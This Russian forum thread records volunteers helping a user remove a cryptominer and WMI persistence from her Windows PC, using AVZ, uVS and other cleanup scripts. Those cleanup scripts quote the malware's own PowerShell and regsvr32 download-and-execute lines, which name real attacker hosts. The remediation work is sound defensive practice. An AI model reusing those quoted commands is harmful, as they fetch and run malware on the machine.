Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   Компьютер заражен conhost.exe (http://forum.oszone.net/showthread.php?t=339281)

A_kitten 17-02-2019 19:31 2858456
Компьютер заражен conhost.exe
 
Не могу победить conhost.exe. Несколько раз пролечила через DrWeb Cureit в основном и безопасном режимах. При первом прогоне было 203 зараженных файла, потом все меньше и меньше, но этот зловред пока непобедим. Выполнила 8 стандартную утилиту при открытых браузераз, файл прилагаю, а также утилиты № 2 и № 3. Ссылка на файл по утилите № 8 https://cloud.mail.ru/public/6eRb/BXGYXXFh9
Спасибо, жду помощи, Очень!

A_kitten 17-02-2019 19:42 2858460
Немного погуглила, ребята еще советуют прогнать утилиту HijackThis, т.к. после загрузки системы открывается самостоятельно бразуер и открывается на левый сайт???? Протокол прилагаю.

A_kitten 17-02-2019 20:58 2858478
Ljgjkyz. ghjnjrjkjv DrWeb Curelt b скринами экрана. Файл протокола большой, не загружается, загрузила в облако, вот ссылка https://cloud.mail.ru/public/7Kjq/XyAsyRCMo
Спасибо.

DJ Mogarych 17-02-2019 21:05 2858479
Ну вообще conhost.exe - это легитимный процесс, непонятно, почему вы на него так ополчились. Другое дело, что компьютер у вас действительно сильно завирусован.

akok 17-02-2019 22:35 2858495
Только логи не те, что нужно
http://forum.oszone.net/thread-98169.html

++++
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

A_kitten 18-02-2019 14:37 2858588
Добрый вечер, все сделала, логи прилагаю. Спасибо за помощь!

Sandor 18-02-2019 15:27 2858601
Здравствуйте!

Пролечите систему с помощью KVRT, затем соберите свежий CollectionLog Автологером.

A_kitten 18-02-2019 15:55 2858608
именно ПРОЛЕЧИТЬ?

Sandor 18-02-2019 16:13 2858611
Верно, пролечить. То есть, что найдёт, удалять.

A_kitten 18-02-2019 17:11 2858624
Пролечила, прилагаю новые протоколы CollectionLog Автологером

A_kitten 18-02-2019 17:11 2858625
Пролечила, прилагаю свежие протоколы CollectionLog

Sandor 18-02-2019 17:21 2858626
Пока не вижу :)

A_kitten 18-02-2019 17:26 2858627
Протоколов не видите? У меня отображаются в переписке, скрин экрана приложить?

A_kitten 18-02-2019 17:27 2858628
на 1 экране переписки, на сообщение выше поднимитесь, плиз. и вот еще раз...

Sandor 18-02-2019 17:35 2858629
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 StopService('4583963912805CEE');
 QuarantineFile('C:\Users\Admin\AppData\Local\Temp\79637D6-56CFB6FA-6DBDCE26-69199DA0\28329f2f.sys', '');
 QuarantineFile('c:\windows\temp\conhost.exe', '');
 DeleteFile('C:\Users\Admin\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk');
 DeleteFile('C:\Users\Admin\AppData\Local\Temp\79637D6-56CFB6FA-6DBDCE26-69199DA0\28329f2f.sys', '64');
 DeleteFile('C:\Users\Admin\Favorites\Links\Интернет.url');
 DeleteFile('c:\windows\temp\conhost.exe', '');
 DeleteFile('c:\windows\temp\conhost.exe', '64');
 DeleteService('4583963912805CEE');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\pcifpznyvs', 'command', '64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start', 'command', '64');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
 DeleteFile(GetAVZDirectory+'quarantine.7z');
 ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

Через Панель управления удалите ненужный
Код:
Avast Update Helper
Затем пройдитесь соотв. утилитой: Чистка системы после некорректного удаления антивируса.

Java 7 Update 51 - очень устаревшая и уязвимая версия. Тоже удалите и, если нужна, установите актуальную.


Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
Прикрепите свежий CollectionLog.

A_kitten 18-02-2019 18:27 2858633
1. Скрипты выполнила.
2. Файла отправила по форме.
3. Avast Update Helper через Панель управления -> Программы и компоненты не нашла,а по другому не знаю как удалить.
4. Утилитой чистки следов антивируса AVAST Software a.s. прошлась.
5. Java 7 Update 51 удалила все.
5. Свежие протоколы прилагаю.

A_kitten 18-02-2019 19:08 2858640
А это сообщение имеет отношение к печальной ситуации на моем копьютере. При запуске компьютера вылазит "Возникла ошибка при запуске с\windows\debug\item.dat" не найден модуль"

Попробовала Касперского установить. Все также печально. "Произошла ошибка при установке программы"... Можете помочь?

A_kitten 19-02-2019 07:34 2858711
Добрый день! Продолжение. Проверила сегодня свежей утилитой DrWeb CurelT. ситуация практически не поменялась, повылазили те же тараканы, скрин прилагаю.
Можно мне чем то помочь? или все так печально? :(((

Sandor 19-02-2019 09:34 2858719
Не отчаивайтесь :)

Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования,
  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
Подробнее читайте в руководстве Как подготовить лог UVS.

A_kitten 19-02-2019 10:02 2858726
Спасибо, что ответили, комп домашний, вечером продолжу сканировать обязательно.

A_kitten 19-02-2019 14:28 2858783
Выполнила. Только 1 утилита работает до сих пор. ЕЕ закрыть? Протокол прилагаю. Файл получился большой, поэтому выкладываю ссылку. https://cloud.mail.ru/public/KNgX/BTYBoTLrr

Sandor 19-02-2019 15:03 2858789
Цитата:
Цитата A_kitten
ЕЕ закрыть? »
Предположу, что уже закончила. Если нет, закройте.

Далее:
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.1.2 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG
    ;---------command-block---------
    delwmi HTTP://173.208.139.170/2.TXT
    delwmi HTTP://35.182.171.137/3.TXT
    delref HTTP://JS.1226BYE.XYZ:280/V.SCT
    delwmi HTTP://WMI.1217BYE.HOST/1.TXT
    delref HTTP://GO.MAIL.RU/DISTIB/EP/?Q={SEARCHTERMS}&PRODUCT_ID=%7B36211421-F73F-4DB9-AC43-EAF0EE80A431%7D&GP=820851
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\PPOILMFKBPCKODOIFDLKMKEPCAJFJMHL\7.0.25_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PPOILMFKBPCKODOIFDLKMKEPCAJFJMHL\5.0.1_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\MFMJPFOGGIKOLKFILOFBPGCNHDCGAHIB\3.0.2_1\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\EIODDFAEPDOEIFBHJPHFEFGIPCJCDIEO\7.0.25_0\ПОИСК MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PFJGIBHMCGNCMJHDODPAOLFBJPJJAJAL\3.0.2_0\ПОИСК MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\EIODDFAEPDOEIFBHJPHFEFGIPCJCDIEO\7.0.25_0\ПОИСК MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\NEHAPOFAKGHLJOPFEGJOGPGPELJKHJJN\8.24.1_0\ПОИСК И СТАРТОВАЯ — ЯНДЕКС
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\AOJOECKCMJGHLCHNNENFKBFLNDBEPJPK\8.24.1_0\ПОИСК И СТАРТОВАЯ — ЯНДЕКС
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\LADDJIJKCFPAKBBNNEDBHNNCIECIDNCP\8.23.0_0\ПОИСК ЯНДЕКСA
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\PJFKGJLNOCFAKOHEOAPICNKNOGLIPAPD\2.0.1.15_0\СТАРТОВАЯ — ЯНДЕКС
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PJFKGJLNOCFAKOHEOAPICNKNOGLIPAPD\1.2.0.1_0\СТАРТОВАЯ — ЯНДЕКС
    bl BF69865A3ACD3379B0A8D870CCD43618 113
    zoo %SystemRoot%\WEB\N.VBS
    delall %SystemRoot%\WEB\N.VBS
    zoo %SystemRoot%\TEMP\78AF6A03-09CC-4A56-93D3-A2F488A462A0
    delall %SystemRoot%\TEMP\78AF6A03-09CC-4A56-93D3-A2F488A462A0
    delref A.EXE
    zoo %SystemRoot%\TEMP\BDBAE61F-CE5E-402C-B1EB-72C84A863192
    delall %SystemRoot%\TEMP\BDBAE61F-CE5E-402C-B1EB-72C84A863192
    zoo %SystemRoot%\DEBUG\ITEM.DAT
    delall %SystemRoot%\DEBUG\ITEM.DAT
    delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
    zoo %SystemRoot%\DEBUG\OK.DAT
    delall %SystemRoot%\DEBUG\OK.DAT
    delref S.DAT
    delref S.RAR
    delref S&AMP;C:\WINDOWS\UPDATE.EXE
    delwmi &POWERSHELL.EXE
    delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://173.208.139.170/S.TXT')&POWERSHELL.EXE
    delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://35.182.171.137/S.JPG')||REGSVR32
    delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://WMI.1217BYE.HOST/S.PS1')&POWERSHELL.EXE
    apply

    zoo %SystemRoot%\TEMP\CONHOST.EXE
    bl 147BA798E448EB3CAA7E477E7FB3A959 221184
    addsgn 925277BA106AC1CC0B24544E33231995AF8CBA7E8EBD1EA3F0C44EA2D3388D5DF8652EEF3F559D492A5BF198CD08CA1481CE336395DB6B5F26028CA4D985CC8F 8 Trojan.Win64.Miner.kau [Kaspersky] 7

    zoo %SystemRoot%\INF\MSIEF.EXE
    bl 9091762417FBD6E7DFC3E024ECE18DF4 304983
    addsgn 1A22739A5583C28CF42B95BCAC695105D7FFFE044A08F63C83C3C53F31D271C7E294A25F3E92DC4DE38FC79F81173DE33EDF2B27DE36E6D3587F2FDE2FA8178C 8 Trojan.BAT.Starter.ly [Kaspersky] 7

    chklst
    delvir

    deltmp
    czoo
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
    Если архив отсутствует, то заархивруйте папку ZOO с паролем virus.
  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
Подробнее читайте в этом руководстве.


Соберите и прикрепите еще раз контрольный лог uVS.

A_kitten 19-02-2019 15:57 2858797
Скрипт выполнила. Компьютер перезагрузился. Архив с ZOO_... отправила с помощью формы. Контрольный лог от uVS утилиты прилагаю. По ссылке https://cloud.mail.ru/public/FdRq/TmSNBiNjK

Sandor 19-02-2019 16:16 2858798
Обновления системы ставите? Давайте проверим:
  • Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

A_kitten 19-02-2019 16:24 2858799
В Настройках на обновление стоит "Никогда", вывод, что система не обновляется. Лог прилагаю.

Sandor 19-02-2019 16:30 2858801
Установите эти хотфиксы, иначе лечение бесполезно:

------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления
HotFix KB3140735 Внимание! Скачать обновления
HotFix KB3138910 Внимание! Скачать обновления
HotFix KB3138962 Внимание! Скачать обновления
HotFix KB3145739 Внимание! Скачать обновления
HotFix KB3146963 Внимание! Скачать обновления
HotFix KB3156013 Внимание! Скачать обновления
HotFix KB3156016 Внимание! Скачать обновления
HotFix KB3155178 Внимание! Скачать обновления
HotFix KB3153171 Внимание! Скачать обновления
HotFix KB3170455 Внимание! Скачать обновления
HotFix KB3178034 Внимание! Скачать обновления
HotFix KB3185911 Внимание! Скачать обновления
HotFix KB3184122 Внимание! Скачать обновления
HotFix KB3192391 Внимание! Скачать обновления
HotFix KB3197867 Внимание! Скачать обновления
HotFix KB3205394 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4019263 Внимание! Скачать обновления
HotFix KB4022722 Внимание! Скачать обновления
HotFix KB4015546 Внимание! Скачать обновления
HotFix KB4025337 Внимание! Скачать обновления
HotFix KB4034679 Внимание! Скачать обновления
HotFix KB4041678 Внимание! Скачать обновления
HotFix KB4056894 Внимание! Скачать обновления
HotFix KB4056897 Внимание! Скачать обновления
HotFix KB4074587 Внимание! Скачать обновления
HotFix KB4103712 Внимание! Скачать обновления
HotFix KB4343899 Внимание! Скачать обновления
HotFix KB4457145 Внимание! Скачать обновления
HotFix KB4462923 Внимание! Скачать обновления
HotFix KB4486563 Внимание! Скачать обновления

A_kitten 19-02-2019 16:33 2858802
Спасибо выполняю.

A_kitten 19-02-2019 19:07 2858824
Пока еще устанавливаю обновления. Это закончится часа через 2. Что делать после того, как установлю все обновления?

A_kitten 19-02-2019 21:50 2858871
Установила все обновления. Запустила утилиту AutoLogger-test. Протоколы прилагаю. Какие мои дальнейшие действия?

A_kitten 20-02-2019 03:48 2858939
Результат проверки DrWeb CurelT привожу

Sandor 20-02-2019 09:31 2858954
Скриншоты можно в виде картинки прикреплять.

Сделайте свежий лог uVS.

A_kitten 20-02-2019 10:17 2858961
Cвежий лог uVS.

Sandor 20-02-2019 10:29 2858963
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.1.2 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG

    ;---------command-block---------
    delref HTTP://JS.1226BYE.XYZ:280/V.SCT
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\PPOILMFKBPCKODOIFDLKMKEPCAJFJMHL\7.0.25_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PPOILMFKBPCKODOIFDLKMKEPCAJFJMHL\5.0.1_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\MFMJPFOGGIKOLKFILOFBPGCNHDCGAHIB\3.0.2_1\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\EIODDFAEPDOEIFBHJPHFEFGIPCJCDIEO\7.0.25_0\ПОИСК MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PFJGIBHMCGNCMJHDODPAOLFBJPJJAJAL\3.0.2_0\ПОИСК MAIL.RU
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\NEHAPOFAKGHLJOPFEGJOGPGPELJKHJJN\8.24.1_0\ПОИСК И СТАРТОВАЯ — ЯНДЕКС
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\LADDJIJKCFPAKBBNNEDBHNNCIECIDNCP\8.23.0_0\ПОИСК ЯНДЕКСA
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\PJFKGJLNOCFAKOHEOAPICNKNOGLIPAPD\2.0.1.15_0\СТАРТОВАЯ — ЯНДЕКС
    delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PJFKGJLNOCFAKOHEOAPICNKNOGLIPAPD\1.2.0.1_0\СТАРТОВАЯ — ЯНДЕКС
    bl BF69865A3ACD3379B0A8D870CCD43618 113
    zoo %SystemRoot%\WEB\N.VBS
    delall %SystemRoot%\WEB\N.VBS
    delref A.EXE
    delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
    delref S.DAT
    delref S.RAR
    delref S&AMP;C:\WINDOWS\UPDATE.EXE
    zoo %SystemRoot%\DEBUG\ITEM.DAT
    delall %SystemRoot%\DEBUG\ITEM.DAT
    apply

    zoo %SystemRoot%\INF\MSIEF.EXE
    bl 9091762417FBD6E7DFC3E024ECE18DF4 304983
    addsgn 1A22739A5583C28CF42B95BCAC695105D7FFFE044A08F63C83C3C53F31D271C7E294A25F3E92DC4DE38FC79F81173DE33EDF2B27DE36E6D3587F2FDE2FA8178C 8 Trojan.BAT.Starter.ly [Kaspersky] 7

    chklst
    delvir

    czoo
    deltmp
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
    Если архив отсутствует, то заархивруйте папку ZOO с паролем virus.
  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
Подробнее читайте в этом руководстве.


Ещё раз лог uVS, пожалуйста сделайте.

A_kitten 20-02-2019 14:50 2859002
Выполнила скрипт, отправила файлы в форме, прилагаю свежий лог

Sandor 20-02-2019 15:14 2859006
Не сдается. Ну ничего, мы тоже не сдаемся ))
  1. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
  2. Запустите файл TDSSKiller.exe.
  3. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
  4. В процессе проверки могут быть обнаружены объекты двух типов:
    • вредоносные (точно было установлено, какой вредоносной программой поражен объект);
    • подозрительные (тип вредоносного воздействия точно установить невозможно).
  5. По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.
  6. Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.
  7. Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).
  8. Самостоятельно без указания консультанта ничего не удаляйте!!!
  9. После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.
  10. Прикрепите лог утилиты к своему следующему сообщению
По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
Например, C:\TDSSKiller.3.0.0.44_10.05.2015_13.39.01_log.txt

A_kitten 20-02-2019 21:17 2859094
Вложений: 2
Утилиту выполнила, ком-р предложил перезагрузку, сделала, утилита снова стартанула теперь сама, снова проверила, и так несколько раз, т.к. один файл не излечивается. приложила все логи.

Sandor 21-02-2019 10:05 2859149
Цитата:
Цитата A_kitten
один файл не излечивается »
Нет, просто система заражается по новой.

Проверьте еще раз уязвимости, на этот раз так:
Выполните скрипт в AVZ при наличии доступа в интернет:

Код:
var
LogPath : string;
ScriptPath : string;
begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';
  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else
begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath)
else begin
      ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
      exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить.
В первую очередь это относится к браузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.

Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления (если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

После устранения возможных уязвимостей ещё раз соберите лог TDSS.

A_kitten 21-02-2019 10:30 2859156
Большое спасибо за помощь. Отпишусь теперь уже после отпуска. ДО отпуска сделать не успею. Убегаю, но я вернусь, т.к. вопрос не закрыт.
СПАСИБО!!!!


Время: 13:02.

Время: 13:02.
© OSzone.net 2001-